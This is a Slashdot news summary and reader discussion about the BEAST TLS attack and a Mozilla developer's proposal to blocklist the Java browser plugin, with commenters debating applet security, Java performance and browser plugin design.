To Stop BEAST, Mozilla Developer Proposes Blocking Java Framework

rastos1 writes with this news from The Register: "In a demonstration last Friday, it took less than two minutes for researchers Thai Duong and Juliano Rizzo to wield the exploit to recover an encrypted authentication cookie used to access a PayPal user account. ... The researchers settled on a Java applet as their means to bypass SOP, leading Firefox developers to discuss blocking the framework in a future version of the browser. ... 'I recommend that we blocklist all versions of the Java Plugin,' Firefox developer Brian Smith wrote on Tuesday in a discussion on Mozilla's online bug forum. 'My understanding is that Oracle may or may not be aware of the details of the same-origin exploit. As of now, we have no ETA for a fix for the Java plugin.'"

Java still there

[Pieroxy]

I have to say I am actually surprised to see how many people still have a Java plugin for their browsers. I had a look at the analytics of my website and it looks like more than 80% of my visitors have one.

I heavily use Java on the desktop (Eclipse, etc) and on my servers (Tomcat) but I thought Java Applets to be dead for long.

Re:Java still there

[CFBMoo1]

Not really since games like Minecraft run on the desktop or in the browser using Java.

Re:Java still there

I know no one rtfa but thearticle gives plenty of examples of webapps that rely on Java. Loads of corporate apps rely on it. I think that this is a bad move without a whitelist being released in tandem,which they are considering

Re:Java still there

[LWATCDR]

Why?
Java is a much nicer development system than say Flash.
Frankly Java applets got a bad rap because of Java abuse. I blame Microsoft for that. You see FrontPage had animated buttons as an option and they where freaking java applets.
No one should have to wait for java just for buttons.
It is a shame that applets have gotten such a bad rep. It is an even bigger shame that Apple and Google are not supporting Java on IOS, Android, and Chrome.

Re:Java still there

[nschubach]

Also, VPN portals..

Re:Java still there

[Pieroxy]

Back in the days, I was impressed by HotJava. This was a full blown web browser developed in Java. No Javascript. It worked well and, as expected, ran Java Applets natively.

I still don't know why they dropped the development...

Re:Java still there

[ToasterMonkey]

... and DRAC remote console on any Dell server among many other things.

You can infer a lot from the "Java is dead" crowd, like they probably don't have a job in IT, or they don't use UNIX, like to say things are dead a lot, etc.

Re:Java still there

[jellomizer]

Legacy Systems tend to have a Java Applet to "Web Base" their applications... Mostly because these apps were webified back in the early 2000's where HTML was quite limited, as well the fact that HTML disconnects makes it rather impractical or at least a demanding job to interface with those old telnet/terminal application. That don't disconnect after each request. Being that Java was supposed to be cross platform it was a better choice then choosing ActiveX.

Then there are those Java Applet Games that stuck around for too long, like the ones that Yahoo use to host. And there is those Java Auto Launch apps, that require java to be installed for them to run... Once Java is setup the Applets are setup too...

Then there are also things like the IBM/Lenovo driver update tools off the website that finds the newest drivers for your PC etc....

Java isn't dead, It is just not often used for anything big like they hoped (on the desktop)

Re:Java still there

[thegarbz]

Java plugins are distributed via the JRE and could also be delivered by 1 click as a plugin when needed by a website. It's quite conceivable that someone doesn't even know it's installed. I just looked and not only do I have it installed but it's the most up to date version too.

Plus my Mozilla has something called the Windows Live Photo Gallery, whatever that is. I certainly don't remember installing anything like that.

Re:Java still there

[drinkypoo]

I still have an antique printer (HPLJ2100) and the management console uses Java applets.

Re:Java still there

[djdanlib]

Your average Web user will install ANYTHING if they want to view a website or if some banner ad promises them some "cool" thing. They'll just blindly bomb that OK button like a trained hamster pushing the button to get a pellet. (That's not a bad simile.) Seriously, you could title it "Spy Formatter Pro" and they would install it, because they wouldn't even read the title.

Then once installed, it's out of sight, out of mind - the idea that "this plugin is going to stick around after I close this website" is way too technical for everyone to understand, never mind "other websites might use it maliciously". The web is like a newspaper for most folks, I guess. When you're reading the newspaper, your attention span isn't going to include the previous few pages, or something from last month, unless you specifically knew you needed to remember it. You're not even going to care that the paper is selling your identity to make a few extra bucks and subsidize your paper. You just want to pay your nickel and read your paper.

Quite a pain in the rear for those of us who have desktop users and/or family, for whose computers we take some responsibility. We obviously shouldn't take it out on them no matter how much it pains us to see them repeat the same mistakes over and over. They just don't know what they're doing, so we have to make sure there are safeguards in place like BANISHING JAVA from your average computer and maybe requiring approval for plugin installation from someone with the smarts to know better than to install "Free Funny Video Plugin.exe" or whatever!

Re:Java still there

[egamma]

No one should have to wait for java just for buttons.

People don't like to wait, period. Java is slow, at least on Windows, and I suspect any platform other than Solaris.

Re:Java still there

[Short+Circuit]

I know IE/ActiveX supports trust levels for remote code. (I.e. "I don't want these users running ActiveX code from anything but the trusted servers on our intranet"). Does Java have similar capabilities?

Re:Java still there

[Oirad]

Not to pick nits, but that's your "antique" jetdirect card, not the printer...

Re:Java still there

[djdanlib]

I play too, but I disabled the browser plugin after installing Java. That's the thing - you can't JUST install the JRE, which would be a lot safer. You always get the browser plugin no matter what.

Re:Java still there

[mattb112885]

My school (and the school I graduated from before this) use Blackboard Vista for posting grades, assignments, and so on. It relies on Java for its function.

Re:Java still there

Why?
Java is a much nicer development system than say Flash.
Frankly Java applets got a bad rap because of Java abuse. I blame Microsoft for that. You see FrontPage had animated buttons as an option and they where freaking java applets.
No one should have to wait for java just for buttons.
It is a shame that applets have gotten such a bad rep. It is an even bigger shame that Apple and Google are not supporting Java on IOS, Android, and Chrome.

Wrong.

Android heavily supports java. Java applets on android's browser is a different story.

Also, Microsoft is not the one to blame. Instead blame Oracle (or Sun, the former Java maintainer) for all the exploit abuses that are on the loose.

Get your facts straight.

Re:Java still there

[LWATCDR]

Not any more. Really that is one of those myths that will never die. On a modern system Java will load up pretty dang fast. The browsers could also have an option to preload in the background using a thread if enough people where using Java to make it worth while.

Re:Java still there

[UnknowingFool]

That's what's wrong with kids these days. Back in my day we didn't have these fancy personal computers to compile code; we had to wait our turn with the one computer with our punch cards. And the punch cards at my school weren't those sissy paper ones. Ours were manly stone cards. If you made a mistake, you had to walk uphill both ways in the snow (even during summer!) to cut another one. If you were lucky, Chuck Norris would lend you his comb to cut the stone. If you weren't, you had to use your swinging cod piece. Kids these days.

Re:Java still there

[sgt+scrub]

My guess is there wasn't a way to take advantage of NPAPI. ie. You had to write native Java apps to integrate other types of content.

Re:Java still there

[gilleain]

Why? Java is a much nicer development system than say Flash.

Really? I do a lot of desktop and server java, but not much applet development. It's not great, and I expect that if you want to do animations, music and that, there are better tools for producing flash versions.

Re:Java still there

[DrXym]

A better idea would be for Mozilla to take the approach Google are following and interfere with the exploit making it unlikely anyone would be attached to a site long enough for it to matter. They should (working in tandem with other browser vendors) give notice that SSL & TLS 1.0 are deprecated, that the protocols will be active for 12 months and then disabled thereafter and require a user to manually reenable them. That might put some pressure on sites to actually upgrade.

In the meantime they can work with Oracle to produce a fix for the Java plugin.

Re:Java still there

[gilleain]

Pls, where can I find this "Free_Funny_Video_Spy_Malware_Trojan.exe" program? I would like to install it across all my machine networks, thx.

Re:Java still there

[DrXym]

Java isn't slow. Like any runtime it has a startup cost. Once that's over with it works perfectly well for even large apps. Eclipse for example. Aside from that I doubt you'd even know what language an app was running in unless you went poking around in its directory, or the app gave itself away (e.g. by using metal theme).

Re:Java still there

[Creepy]

Java plugin based internet apps for enterprise are very common, especially in the CAD/CAM/CAE space because they can run on multiple platforms and some of those spaces are heavily entrenched in UNIX (with a trend toward Linux UNIX-like), and many of those depend on Firefox for cross platform support.

Re:Java still there

[rb12345]

The problem here is that both Firefox and OpenSSL lack support for TLSv1.1 and 1.2. That needs to be addressed before planning to remove SSL3/TLSv1.0 support. In the short-term, the Chrome/OpenSSL fix will hopefully work well enough, and IE9/Opera can disable TLSv1.0 now if you really want.

Re:Java still there

[Pieroxy]

Well... they stopped the project once it was up. Their goal was to demonstrate the Java technology, not to make a web browser as a sustained product.

Yes plugins were Java based of course, but I'm sure that could have worked. But let me tell you, by 200, we (linux & non windows users) were in sore need for a web browser. A Java-based one would have done it ;-)

Re:Java still there

[muindaur]

My college uses Blackboard, and the only way to upload files from the computer is via the Java plugin (odd since a school I went to before didn't need it to upload, unless more recent versions of blackboard added it.) Once I'm done with needing it, I do plan on getting rid of it. It's another plugin I don't really care for.

Re:Java still there

[idontgno]

I'm sure it's not a meaningful distinction if the jetdirect card was included in the printer at time of installation. The fact that HP sold nearly-mandatory interface items as optional separate SKUs isn't really an argument for the distinctiveness of the interface card as much as a clear indication of HP's greedy marketing practices.

Re:Java still there

[Tsingi]

Your average Web user will install ANYTHING if they want to view a website or if some banner ad promises them some "cool" thing

I've been looking at tick based web games recently. A surprising number of them want to install exe files. I can't run an exe file, but I wouldn't dl and run it even if I could. May as well throw security and privacy right out the window.

AFAICT none of these games NEED to run an exe on your puter.

I'm sure I'm the exception, not the rule.

Re:Java still there

[jmrives]

Just so that there is no confusion..., Google does support Java in a big way. Java is the development language for Android. They also provide Google Web Toolkit, which allows one to write browser side code in Java which then gets translated into HTML and Javascript. There are Eclipse plug-ins for both Android and GWT SDKs. I use them daily and I am very pleased with Googles support of Java and these software development kits.

Re:Java still there

Oracle (Sun) Java gets a lot of abuse because of the abusive practices of their development and deployment model. They don't actually create patches; only full versions. And, those full versions don't maintain backwards compatibility within a family (for instance 1.6_22 will have a feature that mysteriously disappears in 1.6_26). They break applications with each new "critical security release". The vendors who had the misfortune to choose Oracle / Sun JRE as their development target have to fix their apps every time a security release comes out. An example from earlier this year: out comes a "critical security update". We apply it (it is really a full version of course). Now the logon screen for one of our Java apps has blue text box background with blue text. Yes, there are a lot of apps that continue working fine with new JRE versions. But there are also a damn lot of them that break. We manage 80,000 desktop / notebook machines and EVERY SINGLE JRE release causes at least some apps to break. If we could put out an edict requiring new applications being developed or purchased to not use Oracle JRE we would absolutely do so. Oracle simply does not get the concept of a patch for Java and never has.

Re:Java still there

[egamma]

Not any more. Really that is one of those myths that will never die. On a modern system Java will load up pretty dang fast. The browsers could also have an option to preload in the background using a thread if enough people where using Java to make it worth while.

I have a perfectly modern computer. I use HP Sitescope, which has a web interface. Version 9.5 is HTML based--and it's fast, even on a 5 year old 32 bit system. Click a link and the page loads in a quarter-second. I just installed Version 11.11, on a newer, 64 bit system. Version 11 has a java interface, and is takes 3 seconds to load each page--and it's must slower if I'm working remotely, instead of sitting in the same building. And I'm not counting the start-up time.

My explanation? Java is slower than HTML.

Re:Java still there

[causality]

I play too, but I disabled the browser plugin after installing Java. That's the thing - you can't JUST install the JRE, which would be a lot safer. You always get the browser plugin no matter what.

At least on Gentoo, the browser plugin is toggled by the "nsplugin" use flag. You can have a JRE or a JDK without a plugin.

That indicates you could have the same option on any other distro if you're willing to compile it from source. I'm not sure if that's true for Windows but there's no reason it couldn't be.

Re:Java still there

[MightyMartian]

1999 called and wants their anti-Java rant back.

Re:Java still there

[networkBoy]

My expense reporting tool is a java app.
My timecard tool is a java app.
I just had to install java web plugin support at home for my wife's on-line class.
yeah, this will cause issues if there is not a whitelist capable entry that end-users can manage (but then Mr. Sixpack will likely "trust" everything).
-nB

Re:Java still there

[0123456]

Aside from that I doubt you'd even know what language an app was running in unless you went poking around in its directory, or the app gave itself away (e.g. by using metal theme).

The multi-second garbage collections and multi-gigabyte memory usage for a text editor tends to be a pretty good indication of a Java app.

Re:Java still there

[petermgreen]

How can you even compare Flash and Java?

For those trying to develop apps in a web browser that don't fit the traditional page by page model there are essentially 4 choices.

1: AJAX
2: Java applet
3: FLASH
4: Activex control

So of course those choices will get compared. They all have strengths and weaknesses of course but they can be used for much the same tasks.

Re:Java still there

[jonadab]

The most prominent Java applet of which I am aware is the clock at nist.time.gov, but yeah, in general, Java is at least a hundred times more widely deployed on the web than Silverlight. (Granted, Flash is at least a hundred times more widely deployed on the web than Java.)

My personal preference would be to eliminate content-handling plugins entirely and switch everything totally over to a helper-apps model, wherein non-web content opens in a separate process in a separate window using the operating system's normal "file associations" model to determine which application to use. Sharing the browser's process, memory space, and window with a third-party program is just asking for trouble. It would be a bad idea from a stability standpoint even if deliberate abuse were impossible, which it isn't. It's also bad for usability, because the user's expectations (that everything in the browser window will behave similarly -- just for example, that if it looks like part of the web page it will print along with the rest of the page when the user hits the print button on the browser's toolbar) are shattered six ways to Sunday. Launching such content in its own window external to the browser and letting the OS decide what app to send it to solves several whole categories of problems in one fell swoop.

Re:Java still there

[billDCat]

"Java is a much nicer development system than say Flash."

That's a pretty subjective statement. I would take doing development in Flash-based Flex development over Java any day. Flash Builder is a very nice development environment, and I would say that laying out a screen using Flex is a heck of a lot easier than using Spring layouts.

Re:Java still there

[m50d]

If even one site you visit uses it, you'd have it installed. It's not like people can't spare the 20mb these days.

Re:Java still there

[HeckRuler]

I dunno man, I'm kind of a fan of freedom and power to the people. Treating the masses like children and putting them in a walled guarded under the lock and key of corporate overlords doesn't seem like the best sort of society.

Re:Java still there

[Transkaren]

Yup. Also, Engineers use a Java applet from USGS to determine seismic requirements for structures. If I could not have Java, I could not work.

Re:Java still there

[LWATCDR]

Netbeans works pretty well.

Re:Java still there

[LWATCDR]

I was thinking of more complex applications. I would hate to write a spreadsheet in Flash or an airfoil simulator. I do not want to think about a spreadsheet in HTML 5 at this point. Google is impressive to say the least but GWT is based on Java so maybe not so much :)

Re:Java still there

[radish]

I work professionally with a mixture of IntelliJ, Eclipse and Visual Studio on a decent spec machine. One of those three performs more slowly and chews up more resources than the other two. I'll give you a hint - it's the one which isn't written in Java.

Not only is Eclipse slightly more than a "text editor" it also performs significantly better than a less-featured IDE written in a supposedly faster language. The "Java is slow" BS has to stop, it hasn't been true for close to a decade now.

Re:Java still there

[DrXym]

I think you would have to be working with massive datasets to experience garbage collection freezes on the client side. Modern VMs don't even freeze the world while they gc.

Re:Java still there

[billDCat]

Flash/Flex can handle complex applications just fine. Here are some examples of applications done with Flex: http://flex.org/showcase.php

In there is a timeline-based video editor, a calendaring/email/finance app, a task manager, and a photo editor. I've also seen a PowerPoint type presentation app, a Visio-type tool for creating object relationship charts, plus I've used it myself for creating a medical reporting application for diagnostic sensor data analysis. Flex can hold it's own very nicely against Java's capabilities, and I think it's easier to develop for and has a better experience installing and running on the client.

That said, we are currently trending away from using plugins at all, due to the mobile platform. More and more will be done with HTML/JavaScript/CSS, leaving plugin-based tools as more niche products for Web development. Flex however now compiles mobile applications, so I think we will see more life in that space.

Re:Java still there

[lgw]

Oh, it's been that way since the dawn of Java. "No, really, Java is fast" except for every actual java app I've ever used. All of them are outliers, of course, and one day I'm sure I'll encounter that mythical fast Java app. Keep the faith!

Re:Java still there

[Jawnn]

Back in the days, I was impressed by HotJava. This was a full blown web browser developed in Java. No Javascript. It worked well and, as expected, ran Java Applets natively.

I still don't know why they dropped the development...

I remember it too, and as you say, it had much promise. I also remember poor tools and for-shit documentation, which probably kept it from making any significant penetration.

Re:Java still there

[egamma]

1999 called and wants their anti-Java rant back.

I'm providing evidence that Java is slow, with a specific, real-world example. Apparently, that doesn't fit into your world-view, but you're entitled to your own delusions. Er, I mean, opinions.

Re:Java still there

[Luthair]

Browser plugins ares automatically installed with the JRE, and maybe the SDK too so you may be using it and not be aware of it.

I've been disabling / removing the browser plugins for years, there just aren't any relevant sites that rely on it anymore and for reference I write Java developer tools for my day job.

Re:Java still there

[dshk]

Flast does not help if you try to do more complex things and in one of our projects it turned out that the same thing runs significantly slower in Flash than in Java.

Re:Java still there

[Stormtrooper42]

Are you sure they don't just want Java back?

Re:Java still there

[desdinova+216]

did you warn them about the 2000 election, and 9/11,

Re:Java still there

[gad_zuki!]

Its a security nightmare. Sun/Oracle haven't been able to secure their VM. End users never upgrade. You'll see people casually running java versions that are months or even years old. The little notifier in the tray is just ignored. Crimepack stats released by Brian Krebs shows that it is the number 1 vector for malware.

Considering how infrequently java is needed by end users, the idea that its sitting there ready to run any applet is crazy irresponsible. FF and the rest should refuse to let it run if its not the newest version and/or throw up a warning about java apps and maintain a java whitelist.

Or we can live in the status quo of massive malware infections.

Re:Java still there

[desdinova+216]

Obligitory XKCD http://xkcd.com/875/

Re:Java still there

[Pieroxy]

Who said anything was dead?

Certainly not me.

Re:Java still there

[briansmith]

Implementing that workaround in the browser will not help when the attacker users Java, because the Java Plugin does not use the browser's TLS implementation; it uses its own.

An Oracle engineer is the one that came up with that technique for interfering with the exploit.

We are going to implement it. I am finalizing the patch now.

Re:Java still there

[xelah]

I get freezes with Eclipse and OpenJDK 7. Not just java, but to some extent the whole system becomes much less usable for 5-15s. Java is just fine as long as the JVM stays entirely in memory, but as soon as, say, a 1GB firefox [cough] process causes some rarely used bits of the Java process to be swapped out you get problems. The gc scans all of its memory, sucking in from disk all sorts of things Eclipse doesn't actually need right now and forcing other application's pages out to disk. Then the whole process repeats in reverse as your other application sucks everything back in. My system isn't well endowed with memory, but however much memory you have it's not good to have to waste it on making sure gc can scan something which isn't even being used.

Re:Java still there

[shutdown+-p+now]

FWIW, Visual Studio is ~50% managed code. The last version that was pure native was VS6.

Re:Java still there

[Lotana]

Yes, ideally you would be right. Sadly idealism never survives in the real world.

Re:Java still there

[DrXym]

Well that sounds more like an artifact of your system than just Java by itself. I can typically run 2 eclipse instances and one complex RCP app (the one I'm currently developing) in 3.5GB 32-bit Windows before things start to chug.

Re:Java still there

[Rexdude]

They're not used only for applets. Java Web Start is a mechanism for distributing desktop java applications through the browser. Clicking a special link triggers the plugin, which will download the application to its local cache and launch it, and optionally create a desktop shortcut for future use. Each time the app is launched, it checks the original JNLP link for a newer version and so can be automatically updated.
For security reasons, unsigned JWS launched applications are restricted from certain operations, such as accessing the local filesystem.

The wiki link lists several end user apps/games that use JWS.

Re:Java still there

[xelah]

It's down to Java's GC effectively hogging physical memory it doesn't really need. 1GB of firefox can cause fewer problems than 400MB of Java because most of that 1GB can be swapped out and left there. You won't see any problems until other applications need enough memory to force parts of Java to disk. I've got 2GB of RAM, and run Eclipse, a Java server, a Java client, apache and a web browser, so there are quite a few times when some of those get substantially swapped out while I'm using the others.

Re:Java still there

[JonySuede]

Java is slow until it reach a steady state... When the jit engine has determined the best machine code for the java code it is fast.

Conclusion:

import static suede.jony.ApplicationType.LONG_RUNNING_APPLICATION;

public final class JavaSelector{
    public final static boolean isJavaAppropriate(ApplicationType applicationType)
    { //always code that way to avoid NPE
        return LONG_RUNNING_APPLICATION.equals(applicationType);
    }
}

Re:Java still there

[drinkypoo]

My printer won't take any JetDirect cards new enough to not have a Java applet, if such a thing even exists. I have the newest and fanciest card you can install. Therefore your comment is stupid.

Re:Java still there

[LWATCDR]

One GB of firefox?
Really?
How many tabs to you have open? And might a suggest Firefox 7 for starters or Chrome.

Okay are are running Eclipse, a Java server, a Java client, apache, and a web browser on a two gig machine. Well for starters get more memory. Also check the memory settings for apache as well. I am also betting you may be running a Database server as well on that machine.

warning?

How about a simple warning before loading a Java Applet? For example, one of those yellow bars at the top of the page? That would prevent all legitimate applets from being instantly unusable in Firefox, whilst providing some security.

Re:warning?

[webheaded]

This. I wonder if there's some sort of Flashblock-like extension to do this. I would certainly prefer it. Unfortunately we actually have a very very important Java applet at work here that I have no real choice but to use.

Re:warning?

[archen]

As the article says, if you create a whitelisting system, most people will just click "whatever" to make it go away. The Slashdot summary isn't totally accurate, as it's implied that all CURRENT versions of Java should potentially be blacklisted until Oracle releases a fix.

Re:warning?

[L4t3r4lu5]

We already do. It's called a Whitelist.

Re:warning?

[petermgreen]

Afaict java applets come into two categories.

There are "untrusted applets" which are sandboxed preventing access to loal resources and limiting access to network resources. Theese run without any warning prompts from the java plugin (IIRC some browsers will put up a warning before launching the plugin but firefox isn't one of them).

Then there are "trusted applets", theese pop up a warning with digital signature information when launched but afaict after that they can do pretty much anything they like to your system! "Trusted applets" are as dangerous as activex controls but for some reason they don't seem to get anything like the ammount of bad PR.

Re:warning?

[internerdj]

Security here is set so stringently that certificate failures pop up on almost every website. I quickly reached the point where it was impractical to browse while verifying all the certificates were valid manually. (Side note: slashdot is giving me one right now.)

Re:warning?

[VGPowerlord]

Yes, strangely it's Java Web Start applications that must request permissions from the users. Signed Java Applets don't seem to have that restriction.

And yes, in a sense it means that unsigned Java Web Start apps are more secure than Signed Applets are.

Re:warning?

[webheaded]

Getting another browser is not a solution but it would be nice to see Firefox implement this behavior instead of just blacklisting the plugin altogether. Certainly a good idea. I wonder why you don't see this more often.

Re:warning?

[mzs]

It's a MITM attack, you will expect java on some site sooner or later, one that you would allow, they send an extra jar that steals the cookies at that point.

Re:warning?

[Caetel]

Chrome does this for a number of plugins, including Java.

Totally overblown.

The viability of the BEAST attack is totally overblown. The attacker must be a man-in-the-middle and control a website that you visit in order to have any chance of getting a cookie/password/thing-of-value that it must already be able to guess. The actual attack is merely defeating the CBC in order to encrypt the guessed value in precisely the same way as the target value, allowing you to compare to see if the encrypted data are equal.

Re:Totally overblown.

[Hatta]

The attacker must be a man-in-the-middle and control a website that you visit in order to have any chance of getting a cookie/password/thing-of-value that it must already be able to guess.

Why is that so implausible? With high profile sites like kernel.org, linux.com, mysql.com being compromised on what seems like a biweekly basis these days, I wouldn't put that out of the realm of plausibility.

Re:Totally overblown.

[sgt+scrub]

Something that can decrypt a cookie can just look at your cookies directly from your machine. If you install an evil Java pluggin it could decrypt and expose the content of your encrypted cookies without you knowing about it.

Re:Totally overblown.

[VGPowerlord]

Something that can decrypt a cookie can just look at your cookies directly from your machine. If you install an evil Java pluggin it could decrypt and expose the content of your encrypted cookies without you knowing about it.

So, if you're already compromised, your information can be compromised?!?!?!?!?!?!?!?!?!

(Apologies to Raymond Chen.)

Re:Totally overblown.

[briansmith]

The applet doesn't have to guess anything with the Java-based attack.

Re:Totally overblown.

[briansmith]

An applet cannot steal the cookies directly but it could cause the JVM to send the cookies in HTTPS requests on its behalf.

Re:Totally overblown.

[hesaigo999ca]

Great comment, what the people fail to realize is that with all these extremely well formed haxors out there, these type of vulnerabilities out there, give them an easier time to do what they need to do....if we take that away from them, they have to find other options...the least the better.

Re:Totally overblown.

[sgt+scrub]

It turns out you don't need anything but to request the encrypted cookie from the browser. If you can decrypt the cookie with data from an exchange you just request a peek at the cookie, decrypt it, ...profit. A pluggin would be an easy way to grab information for decryption though. As to your reference to Chen, I'm sure he would agree that a compromised pluggin shouldn't mean your data is at any greater risk than adding a user to a machine.

Re:Totally overblown.

[sgt+scrub]

You can request a browser to send you any cookie you like. A pluggin or applet is not necessary. Access to the information needed to decrypt the cookie requires the pluggin/applet/MIM attack.

Won't help

[ArsenneLupin]

Couldn't the same exploit be run withing a plain (hidden) auto-refresh frame containing an tag pointing to the victim server?

Indeed, image doesn't enforce "same origin" either, and the server (of the frame) can stil introduce the needed padding into the URL...

Re:Won't help

[Tridus]

Doesn't that pretty much perfectly describe everything Mozilla's been doing in the last 6 months?

Re:Won't help

[jlebar]

I haven't read up too closely on this, but I think traffic going through Firefox itself is not vulnerable. See http://blog.mozilla.com/security/2011/09/27/attack-against-tls-protected-communications/.

Re:Won't help

[BattleApple]

Just like if you handcuff everyone to their beds, there will be no more crime.

There's still a chance some of them would rip off that label on their mattress.

Re:Won't help

[gilleain]

Quickly, we need to block tags too! As a matter of fact, shut down the whole browsing feature! It's just a liability anyway.

Unplug the computer, it's the only way to be sure!

Re:Won't help

[briansmith]

There may indeed be other vectors for an attack that use built-in browser features. However, some characteristics of how the browser manages connections and how it formats HTTP requests would defeat most (all, as far as we know at this time) variations of the attack that use built-in browser features.

Re:Won't help

[mzs]

SOP (same origin policy), the paypal.com cookies will not be sent to evill.com.

That is a monsterous solution

[mrflash818]

...and will further put a stake into the heart of Java in the web.

Re:That is a monsterous solution

quick, someone find a way to exploit it with flash and silverlight!

Re:That is a monsterous solution

[roman_mir]

Actually I think it would put a stake into Mozilla based browsers, because if they block Java plug in today, how do you know what they will do to the browser tomorrow?

AFAIC if they go this road, they are dead as a browser.

Stop trying to make the browser more than it is.

Web browsers are good for viewing static documents, especially ones that link to other static documents.

Time and time and time again, however, they have been shown to be horrible at hosting more complex applications and interactive functionality.

It doesn't matter which embeddable application technology we consider, they are all rife with security flaws. Java applets, ActiveX controls, JavaScript, Flash, and browser plugins (like PDF viewers) have all suffered from numerous security problems.

If you need to provide your users with application-like behavior, then just write a native application!

Browsers are not operating systems. They are not good at hosting applications in a secure manner. Even after two decades of trying, they still aren't suitable environments for hosting applications. It's looking like they never will be, either.

Re:Stop trying to make the browser more than it is

You seem to think that OSes have fared any better. The only reason that exploits come primarily through the browser is because it is far simpler to get a user to run a website/webapp than to download and run a native application. Remove the capability of the browser and force the user's hand into running native applications (and attackers into exploiting them) to do the things he/she wants and your idea of the mighty, secure OS will quickly evaporate.

Re:Stop trying to make the browser more than it is

[Lisandro]

You know, the issue here is not the browser. It's the HTTP protocol - it was simply designed for nothing else but static content. The number of kludges and patches you need to implement basic session handling and interactvity is getting ridiculous. Do we even have a RFC for cookies, for example?

Re:Stop trying to make the browser more than it is

[dingen]

If you need to provide your users with application-like behavior, then just write a native application!

When there was just one popular platform to run these native applications on, this was a fine solution. I mean back when everybody did everything in Windows. But nowadays, people are using all sorts of systems. Not just Mac OS X and Linux on the desktop, but iOS, Android, Windows Phone, BlackberryOS and Symbian on mobile devices as well. So "just write a native applications" actually becomes "write a native applications and then port it to 7 other platforms". That's when a web application suddenly starts to look like a viable alternative.

Less radical solution = better

[clorkster]

I have convinced several non-technical people to stop using IE all together when I could conclusively show them that there was no practical way to disable the Java plugin... Choir preaching over.

While Firefox and Chrome allow practical and real disabling of the Java functionality in their browsers, only Chrome offers really practical functionality for plugins (yes, I'm aware there are several other browsers out there that people deeply love, however testing in the above three tend to give proper rendering on all for web elements, so I don't plan on expanding my repertoire).

In Chrome, if the Java (or Windows Media Player, etc.) plugin is requested by a page, users are prompted to give domain specific permanent access to the plugin or allow it for one-time use. As ridiculously problematic as Java is from a security perspective, it is also extremely useful for enterprise-level products that use it exclusively for powerful web-based back ends (Cisco firewalls for one).

Re:Less radical solution = better

[clorkster]

... or pre-install/integrate NoScript.

Re:Less radical solution = better

[Stormy+Dragon]

Disabling Java in IE9:

Tools->Manage Addons->Click Java Plugin->Select Disable from Menu

Re:Less radical solution = better

[clorkster]

It probably made you feel warm and fuzzy to do so. However, if you now go to a site that is java enabled, you will see that you just accomplished nothing by your efforts. Java is still woefully enabled.

Re:Less radical solution = better

[maxume]

So what about "Manage Add Ons"-> "Disable" does not work?

Re:Less radical solution = better

[clorkster]

So what about "Manage Add Ons"-> "Disable" does not work?

Everything. I have been continuously testing that fact since a co-worker was the victim of a java exploit. Whether it's disabled or not, IE loads Java exactly the same.

Re:Less radical solution = better

[maxume]

If I select show "All add-ons" and disable all 4 Sun entries, when I visit here:

http://futureboy.us/frinkdocs/FrinkApplet.html

I get an alert that an add-on is disabled.

(I restarted after disabling them, just to be sure).

Re:Less radical solution = better

[clorkster]

Not sure if it's a security setting, but I can't get that site to load the plugin in IE, period. On my corporate intranet, we have a back end remote management item for all the computers on the domain that is jave-based. No matter how I set the add-on settings for java, the applet loads right up. Restart included.

Re:Less radical solution = better

[mzs]

This is a MITM attack, they inject the jar on a site that you have whitelisted, and now they have your session cookies for paypal or what not.

Re:Stop trying to make the browser more than it is

[Lisandro]

Nowadays you have a lot of options to ease code porting - including the allmighty "write once, run everywhere" Java. Lately i've been working a lot with Python and i'm amazed of how painless it was to port apps between Windows and *nix (i.e, no pain at all).

Re:Stop trying to make the browser more than it is

[Pieroxy]

You know, the issue here is not the browser. It's the HTTP protocol - it was simply designed for nothing else but static content. The number of kludges and patches you need to implement basic session handling and interactvity is getting ridiculous. Do we even have a RFC for cookies, for example?

The only flaw with HTTP is that it is stateless. It is also its greatest strength.

I'd hardly call cookies 'number of kludges and patches' though. Ah, here is the RFC: http://www.ietf.org/rfc/rfc2109.txt

Re:Stop trying to make the browser more than it is

[Chibi+Merrow]

Okay. Now try porting it to iOS. Or ChromeOS. Or WebOS. Or Blackberry.

I'm gonna bet WP7 and Android wouldn't be painless, either. And good luck getting people to install Python on their Windows box before they can even try your app.

Mozilla Craziness

What is with all of the over-the-top craziness coming out of Mozilla recently? Oracle needs to address the bug, but maybe Firefox could handle it in a more graceful manner than disabling the plugin entirely.

Mozilla, you used to be one of the darlings of open source, now you're turning into a crazy cat lady.

- remove version numbers.
- rapid release schedule breaks add-ons.
- gave the middle finger to enterprise users.
- removed the URL bar.

Re:Mozilla Craziness

It's the same thing that's with the over-the-top trolling on Slashdot that appears in any article remotely related to Mozilla:

Article Title: Microsoft slightly changes changes the alpha blending of the Internet Explorer Icon.

+5 Insightful post:

Well I stopped using Firefox because:
- remove version numbers.
- rapid release schedule breaks add-ons.
- gave the middle finger to enterprise users.
- removed the URL bar.

It's relevant because someone said something about an Internet technology. Firefox is an Internet technology... clearly It must be brought up that my butt hurts because of Firefox. It doesn't matter that the same drivel and refutes have shown up thousands of times. We have moderators which will +5 it rather than mark it as OT or Trolling.

For the love of god... just STFU you fucking 9-y-o. Try 4chan or something.

Re:Mozilla Craziness

[thegarbz]

- removed the URL bar.

What are you smoking?

Sincerely
The man who types www.slashdot.org into the bar at the top of Firefox to get to this page.

Re:Mozilla Craziness

[dgun]

I agree. And I hate to see this happen to Firefox. They seem so eager to appear innovative and edgy, yet haven't really done anything interesting in years.

Re:Stop trying to make the browser more than it is

[thegarbz]

Web browsers are good for viewing static documents, especially ones that link to other static documents.

Yep, but in the past 10 years they've gotten damn good at other things too beside hosting a page with the blink tag. Frankly I don't miss the days of a static web page.

It doesn't matter which embeddable application technology we consider, they are all rife with security flaws. Java applets, ActiveX controls, JavaScript, Flash, and browser plugins (like PDF viewers) have all suffered from numerous security problems.

The same could be said for nearly every application written in any other language. Security is something that needs to be applied from the ground up whether you're designing a database front end designed to run in a web browser or writing a simple native program in C.

Even after two decades of trying, they still aren't suitable environments for hosting applications. It's looking like they never will be, either.

Two decades of trying? Just when do you think Web2.0 actually took off? The proliferation of the browser as an end user environment has really only been popular for less than a decade unless you count the HTML tag that found its way onto every site during the dotcom bubble an application.

You said the environment isn't suitable, I say I'd rather take it with it's standard OS type model of find flaw, fix flaw, rinse repeat then go back to a world of having to find a different bloody native application on every different operating system to do essentially the same function often over a lovely proprietary protocol.

Re:Stop trying to make the browser more than it is

[Lisandro]

Thanks for the RFC reference. Cookies are perhaps the most painless aspect of "modern" HTTP dev work; i was aiming more at atrocities like AJAX.

Re:Stop trying to make the browser more than it is

